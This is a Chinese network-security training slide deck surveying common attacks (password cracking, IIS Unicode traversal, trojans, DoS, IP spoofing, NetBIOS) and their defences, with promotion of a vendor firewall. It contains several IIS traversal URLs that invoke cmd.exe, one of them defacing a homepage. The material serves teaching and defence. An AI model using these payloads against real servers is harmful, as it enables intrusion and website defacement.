1.常见的攻击和防范

1、技术支持工程师 陈伟纯网络安全培训中心 前言：前言： 请注意以下所述：请注意以下所述：五一中美黑客大战中国有九百多家网站被攻破。五一中美黑客大战中国有九百多家网站被攻破。我国的网络安全面临着严峻的考验。我国的网络安全面临着严峻的考验。传统的防御方式是否已经过时。传统的防御方式是否已经过时。蓝盾安全小组 一、常见攻击方法一、常见攻击方法 1.窃取口令 主要有三种方法: A、将UNIX的/ECT目录下的PASSWORD文件读 出来,用工具破密。 B、用常用密码字典。如中文版“万能钥匙” 进行穷尽性尝试破密。 C、网络监听 防冶方法： 用户名/密码一般不少于8位字符，并且尽量使用各种字符交替输入密码

2、。网络安全培训中心 2 2、操作平台漏洞、操作平台漏洞 如往WINDOW/NT的NetBios端口送一串标志为Out of Band的字符串“ABCD” 可致使 NT服务器崩溃。 SUN/OS 在收到错误UDP包时，系统重启。利用UNICODE漏洞 “ “五一”用得最多的UNICODE攻击，利用WIN2000、NT的IIS的UNICODE漏洞。 WIN2000的ISAPI扩展远程溢出漏洞: /null.ida WIN2000的ISAPI扩展远程溢出漏洞: /null.idq IIS 5.0 .printer远程缓冲区溢出漏洞 网络安全培训中心网络安全培训中心 黑客可以远程通过IIS执行以下命令

3、，列出指定URL中 C：盘根目录下的所有内容。 http:/ 或 http:/ c:inetpubwwwrootdefault.htm网络安全培训中心下一步是修改主页: http:/targetip/scripts/.%c1%1c./winnt/system32/cmd.exe?/c+echo+hacked+by+qting+c:inetpubwwwrootdefault.htm.修改页面完成，首页改为: hacked by qting解决办法：解决办法： A、及时的装补丁 B、关闭没用到的端口网络安全培训中心IIS IIS unicode unicode 漏洞漏洞: : /scripts/.

4、%c0%2f.%c0%2f.%c0%2f.%c0%2f. /winnt/system32/cmd.exe?/c+dir /scripts/.%c1%1c.%c1%1c.%c1%1c.%c1%1c./winnt/system32/cmd.exe?/c+dir /scripts/check.bat/.%c0%2f.%c0%2f.%c0%2f/winnt/system32/cmd.exe?/c%20dir%20C: /scripts/check.bat/.%c1%1c.%c1%1c.%c1%1c/winnt/system32/cmd.exe?/c%20dir%20C: IIS CGI文件名二次解码漏

5、洞文件名二次解码漏洞: /_vti_bin/.%35%63.%35%63. %35%63.%35%63.%35%63./winnt/system32/cmd.exe?/c+dir /_vti_bin/.%35c.%35c. %35c.%35c.%35c./winnt/system32/cmd.exe?/c+dir 网络安全培训中心3 3、特洛伊木马、特洛伊木马 原理：原理： 就是将有破坏能力和监控能力的黑客工具隐藏在你觉得“很有用”的软件里面让你下载。 例子例子： A、木马SUB SEVEN （图8） 网络安全培训中心B、网上股票交易 黑客监听用户所有键盘输入（包括账号、密码）和屏幕信息。防治

6、办法：防治办法：使用清除木马的软件 或使用蓝盾防火墙个人版。网络安全培训中心C C、病毒病毒 由于病毒引起的损失也是很大的一个数目由于病毒引起的损失也是很大的一个数目1 1、电脑Nimda蠕虫病毒侵入中国的计算机网络。2、“蓝色代码”泛滥3、CIH曾经跑遍全球4、“尼姆达”电脑病毒向互联网发动袭击5、中国一号（尼姆达与蓝色代码综合） 防治方法：防治方法： A、不要轻易下载不信任网站上的东西 B、不阅读来路不明的电子邮件。如果非 要阅读不可，要先将“宏”关闭。 C、采用专用“木马”检测软件进行检测。网络安全培训中心 4、拒绝服务攻击 最近在Internet上DoS（Denial-of-Servi

7、ce）攻击暴虐一时。由于可以通过使用一些公开的软件进行攻击，它的发动较为简单。同时要防止这种攻击又非常困难，所以蓝盾防火墙系统针对各种DoS攻击做出了防御措施。 网络安全培训中心SYN堵塞攻击原理： （图5）客户端 服务器端 SYN请求 已收到请求 已收到回答 若收不到，服务器会重发 （一般 五次） 网络安全培训中心 解决办法: 使用蓝盾防火墙的智能防御功能。网络安全培训中心 变种变种DDoSDDoS攻击攻击 这次我们在联通国际反美黑客战中，美国黑客伪造出3000多个“合法IP”发起3千多万条SYN请求，4台傀垒机同时发出攻击包，迷惑防火墙。（具体如下图）网络安全培训中心网络安全培训中心5、电

8、子欺骗、电子欺骗 不法分子可以使用IP Spoof的办法伪造来源IP，由于防火墙系统本身具有路由功能，如果没有防御措施，将会被骗，把该虚假来源的IP包发送到局部网络中去，这使非常危险的。蓝盾防火墙系统会根据IP的来源设备进行分析，如果超出该设备的网络范围，将会拒绝该IP包，纪录并发出警告。这样在不网络安全培训中心同物理网络/逻辑网络之间虚假IP包不能通过，保证了系统的安全。 （图10）网络安全培训中心6 6、NETBIOS NETBIOS 攻击攻击 利用WINDOWS 的NETBIOS服务（139端口）获得你的主机名、甚至使用你的共享硬盘。（图11）小黑客网站声称已经拥有上万台主机信息网络安全培训中心 防治办法：防治办法： A、用蓝盾在线检测、端口扫描测试你的 电脑。 B、关闭与互联网相连的网络设备上的 NETBIOS服务协议。网络安全培训中心l后门攻击l拒绝服务攻击l分